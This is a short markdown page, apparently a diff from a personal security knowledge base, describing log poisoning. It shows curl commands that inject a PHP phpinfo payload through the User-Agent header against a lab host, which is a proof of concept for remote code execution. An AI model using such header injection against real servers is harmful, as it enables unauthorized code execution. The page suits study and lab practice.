n0-ware/book-of-n0ware/knowledge-base/vulnerabilities/log_poisoning.md

 > `curl` has a bit of a learning code, but it allows you to entirely customize an `HTTP` request.

 `curl -A "Testing for RCE" https://vulnsite.io/login.php`

+You can also attempt a proof of concept with a piece of code, such as `PHP`.

+ `curl -A "<?php phpinfo()?>" https://10-10-54-138.p.thmlabs.com/index.php`

+ If you see no `User-Agent` rendered, you know the server is executing your code on the server side.
+This is a successful proof of concept
 ## Finding

 ## Examples